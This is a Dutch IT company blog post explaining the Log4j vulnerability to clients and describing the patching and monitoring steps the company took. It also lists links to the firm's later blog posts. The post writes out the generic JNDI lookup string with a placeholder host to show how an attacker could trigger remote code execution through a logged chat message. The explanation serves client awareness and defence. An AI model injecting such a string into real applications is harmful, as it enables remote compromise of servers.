Log4j beveiligingslek

7 januari 2022

Waarschijnlijk heeft u in de media afgelopen weken wel het één en ander voorbij zien komen. Er is een kritieke kwetsbaarheid gevonden in wereldwijd gebruikte software waar u waarschijnlijk nog nooit van gehoord heeft Log4j. Daarom eerst wat uitleg;

Log4j is in een gigantische hoeveelheid platformen, apps en diensten verwerkt. Software van Cisco, IBM, VMware, Fortinet en Red Hat zijn enkele voorbeelden. De precieze toepassing van de library verschilt, maar de registratie van gebeurtenissen in applicaties speelt altijd een rol. Denk aan het noteren van inlogpogingen of de identiteit van de gebruiker van een applicatie.

De applicatie verwerkt een gebeurtenis; Log4j draait data uit. De programmeur van de applicatie bepaalt welke data. Dat kan zoals eerdergenoemd de gebruikersnaam van een gepoogde inlog zijn. Of de tijd waarop een gebruiker inlogt.

De kwetsbaarheid waarop Alibaba’s securityteam stuitte (zij hebben het ontdekt) komt voort uit een wisselwerking tussen programmeertaal Java en library Log4j. Java is in combinatie met Log4j in staat om code in een server op afstand uit te voeren. Daarvoor geven programmeurs de volgende regel mee: ${jndi:ldap://voorbeeld.com/vaneenurl}. De daadwerkelijke url is vervangbaar met het adres van een server naar keuze. Voer je de regel in een Java-applicatie uit, dan probeert de applicatie de data van de gespecificeerde url uit te voeren.

Dit is geen kwetsbaarheid op zich, want in een wenselijk praktijkscenario’s heeft alleen een gemachtigde administrator de mogelijkheid om de regel in een applicatie toe te voegen. Het probleem begint bij Log4j. Draait Log4j de regel uit, dan interpreteert Java precies dezelfde opdracht als een regel die doelgericht door een ontwikkelaar in de applicatie is geplaatst.

Stel dat Log4j is ingesteld om de inhoud van een chatbericht op een online spel te loggen. Een gebruiker van het spel verstuurt de bovengenoemde regel in een chatbericht. De url verwijst naar een server met instructies voor de uitvoering van een malware-applicatie. Log4j draait de regel uit. Java interpreteert een opdracht – en volgt de opdracht netjes op. De gebruiker slaagt in het hacken van de server, zonder ook maar een enkel wachtwoord te hoeven bemachtigen.

Ook heeft het Nationaal Cyber Security Centrum (NCSC) waarschuwt (onderdeel van het ministerie van Justitie en Veiligheid) dat de computersystemen van bijna alle bedrijven en instellingen mogelijk geraakt kunnen worden. Natuurlijk hebben wij hier direct actie op ondernomen.

Wij zijn voor onze klanten, waarvan wij actief hun ICT omgeving beheren, de afgelopen weken heel druk bezig geweest met het in kaart brengen van de problematieken en het inventariseren van mogelijke risico’s. In gevallen waar de betreffende kwetsbaarheid mogelijk (vroeg of laat) van toepassing kan zijn, hebben wij in overleg en afstemming met applicatieleveranciers en softwareleveranciers, de benodigde maatregelen getroffen om dit Log4J lek te dichten. Ook heeft onze monitoring een extra update gekregen welke scant op het kunnen misbruiken van het Log4j beveiligingslek en zijn onze managed firewalls uitgerust met de juiste update definities om een dergelijke aanval te detecteren en blokkeren.

Uiteraard blijft het zaak in de huidige wereld, met toenemende cyber-dreiging, om scherp te blijven en zorg te dragen voor juiste beveiligingsmaatregelen, bewustzijn bij personeel en actief beheer van uw ICT omgeving. Twijfelt u of Log4j binnen uw omgeving voor schade kan zorgen of bent u benieuwd naar welke maatregelen er te nemen zijn om ‘de beveiligingsdrempel’ hoger te leggen, dan kunt u natuurlijk (#superlogisch) een beroep doen op Analyst ICT.

Laatste blogs

Blog

Altijd verbonden! Waarom steeds meer bedrijven kiezen voor KPN mobiel via Analyst ICT

De werkplek van vandaag past niet meer binnen vier muren. Medewerkers werken thuis, onderweg, bij klanten of op kantoor. Bestanden staan in de cloud, vergaderingen vinden plaats via Teams en belangrijke telefoongesprekken worden gevoerd vanaf een smartphone. Juist daarom is een betrouwbare mobiele verbinding belangrijker dan ooit. Bij Analyst ICT zien we dat steeds meer organisaties overstappen naar mobiele telefonie en data-abonnementen via het netwerk van KPN. Niet alleen vanwege de uitstekende dekking, maar vooral omdat medewerkers hierdoor altijd en overal veilig en productief kunnen werken. De smartphone is de nieuwe werkplek Waar vroeger de vaste telefoon centraal stond, is…

Blog

Waarom wij voor Keeper kiezen als zakelijke wachtwoordmanager

Wachtwoorden blijven één van de grootste beveiligingsrisico’s binnen organisaties. Dat klinkt misschien vreemd in een tijd waarin iedereen het heeft over AI, ransomware en geavanceerde cyberaanvallen, maar in de praktijk zien we dat veel beveiligingsincidenten nog steeds beginnen met iets eenvoudigs als een gestolen of hergebruikt wachtwoord. Bij veel organisaties worden wachtwoorden nog opgeslagen in browsers, Excel-bestanden, notities op telefoons of gedeeld via e-mail en Teams. Vaak groeit dat ongemerkt zo. Het werkt immers prima, totdat iemand uit dienst gaat, een account wordt overgenomen of een wachtwoord uitlekt. Juist daarom adviseren wij onze klanten om wachtwoordbeheer serieus te nemen. En…

Blog

Wat de blokkade van Anthropic ons leert over AI-afhankelijkheid

De ontwikkelingen rondom AI volgen elkaar in hoog tempo op. Maar soms gebeurt er iets dat verder gaat dan een nieuwe functie of een betere chatbot. Iets dat laat zien hoe belangrijk AI inmiddels is geworden. Dat gebeurde onlangs toen bekend werd dat de nieuwste AI-modellen van Anthropic, ontwikkelaar van Claude, niet beschikbaar kwamen voor gebruikers buiten de Verenigde Staten. Ook Europese gebruikers werden uitgesloten. Voor veel organisaties lijkt dat misschien een ver-van-mijn-bed-show. Toch laat deze gebeurtenis iets belangrijks zien: AI is niet langer alleen software. Het wordt steeds meer een strategische technologie waar economieën, bedrijven en overheden afhankelijk van…